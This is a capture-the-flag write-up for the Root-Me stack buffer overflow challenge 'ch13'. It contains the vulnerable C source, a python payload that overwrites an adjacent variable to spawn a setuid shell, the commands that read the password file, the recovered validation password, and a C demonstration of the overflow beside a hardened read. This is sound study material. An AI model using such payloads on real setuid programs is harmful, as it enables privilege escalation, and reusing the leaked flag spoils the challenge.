ctf-notes/app-system/elf-x86-stack-buffer-overflow-basic-1/notes.org
Tuan-Dat Tran 5cd3b5a531 feat: app system challenges
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-23 09:19:03 +01:00


ELF x86 - Stack buffer overflow basic 1

Task

Environment settings (as stated on the challenge page):

  • PIE (Position Independent Executable): disabled
  • RelRO (Read Only relocations): disabled
  • NX (Non-Executable Stack): disabled
  • Heap exec (Non-Executable Heap): disabled
  • ASLR (Address Space Layout Randomization): disabled
  • SF (Source Fortification): disabled
  • SRC (access to the source code): enabled

Source code

    #include <unistd.h>
    #include <sys/types.h>
    #include <stdlib.h>
    #include <stdio.h>

    int main()
    {

      int var;
      int check = 0x04030201;
      char buf[40];

      fgets(buf,45,stdin);

      printf("\n[buf]: %s\n", buf);
      printf("[check] %p\n", check);

      if ((check != 0x04030201) && (check != 0xdeadbeef))
        printf ("\nYou are on the right way!\n");

      if (check == 0xdeadbeef)
       {
         printf("Hell yeah! You win!\nOpening your shell...\n");
         setreuid(geteuid(), geteuid());
         system("/bin/bash");
         printf("Shell closed! Bye.\n");
       }
       return 0;
    }

Access credentials for the exercise

  • Host: challenge02.root-me.org
  • Protocol: SSH
  • Port: 2222
  • SSH access: ssh -p 2222 app-systeme-ch13@challenge02.root-me.org
  • Username: app-systeme-ch13
  • Password: app-systeme-ch13

python3 -c "import sys; sys.stdout.buffer.write(b'A'*(40) + b'\xef\xbe\xad\xde')" | ./ch13

Findings (live target)

  • Remote path: /challenge/app-systeme/ch13
  • Binary: ch13: setuid ELF 32-bit, dynamically linked, not stripped
  • Effective mitigations from runtime check:

    • Partial RELRO
    • No stack canary
    • NX enabled
    • No PIE
    • ASLR OFF (on target host)
  • Vulnerability: fgets(buf,45,stdin) writes up to 44 bytes into char buf[40], overflowing 4 bytes into adjacent check.
  • Target value: overwrite check from 0x04030201 to 0xdeadbeef (little-endian bytes \xef\xbe\xad\xde).
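
The 4-byte overwrite described above, as an added example that is not part of these notes or of the challenge: a struct stands in for the ch13 frame (buf directly followed by check, plus slack for the NUL fgets appends), the same constructed 44-byte input is read once with the literal bound 45 and once with a bound tied to the buffer, and check is returned afterwards. It assumes a little-endian host and gcc or clang (for the noinline attribute).

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the ch13 frame: 40-byte buffer immediately followed by check.
 * slack takes the NUL that fgets appends after 44 payload bytes. */
struct frame { char buf[40]; uint32_t check; char slack[4]; };

/* Constructed input: the 44 bytes the notes' python3 one-liner emits. */
static void make_payload(unsigned char out[44]) {
    memset(out, 'A', 40);
    out[40] = 0xef; out[41] = 0xbe; out[42] = 0xad; out[43] = 0xde;
}

/* The bug as shipped: the bound is a literal unrelated to the buffer, so
 * fgets stores up to n-1 bytes plus a NUL past buf. noinline keeps the
 * compiler (and FORTIFY_SOURCE) from learning the real buffer size. */
__attribute__((noinline))
static void read_with_bound(char *buf, int n, FILE *in) {
    if (!fgets(buf, n, in)) buf[0] = '\0';
}

/* Hardened read: bound derived from the buffer; a line that does not fit is
 * reported and its tail drained so it cannot spill into the next read. */
static bool read_line(char *buf, size_t cap, FILE *in) {
    if (!fgets(buf, (int)cap, in)) { buf[0] = '\0'; return false; }
    size_t len = strlen(buf);
    if (len && buf[len - 1] == '\n') { buf[len - 1] = '\0'; return true; }
    if (len + 1 < cap) return true;              /* short last line, no newline */
    for (int c; (c = fgetc(in)) != EOF && c != '\n';) { }  /* discard the rest */
    return false;
}

/* Feeds the payload to one read variant and returns check afterwards.
 * vulnerable=true uses the ch13 bound (45): check becomes 0xdeadbeef on a
 * little-endian host. Otherwise the hardened read leaves check at
 * 0x04030201 and *truncated reports that the line did not fit. */
uint32_t check_after_read(bool vulnerable, bool *truncated) {
    unsigned char payload[44]; make_payload(payload);
    struct frame f = { .check = 0x04030201 };
    FILE *in = tmpfile();                        /* stands in for stdin */
    fwrite(payload, 1, sizeof payload, in);
    rewind(in);
    if (vulnerable) { read_with_bound(f.buf, 45, in); *truncated = false; }
    else            *truncated = !read_line(f.buf, sizeof f.buf, in);
    fclose(in);
    return f.check;
}
```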

Working exploitation flow

  • Basic trigger (proves control of check):

    python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')" | ./ch13

  • To keep stdin open for the spawned SUID shell, use a pipeline with cat, then type the commands interactively:

    (python3 -c "import sys; sys.stdout.buffer.write(b'A'*40+b'\xef\xbe\xad\xde')"; cat) | ./ch13
    id
    cat .passwd
    exit

  • Observed privilege in spawned shell:

    • uid=1213(app-systeme-ch13-cracked)
    • gid=1113(app-systeme-ch13)
  • Retrieved validation password:

    • 1w4ntm0r3pr0np1s

Helper scripts

  • helper_recon.py: SSH recon script (pwd, ls, file, checksec, smoke run).
  • helper_exploit_password.py: SSH interactive exploit script that keeps stdin open and reads .passwd.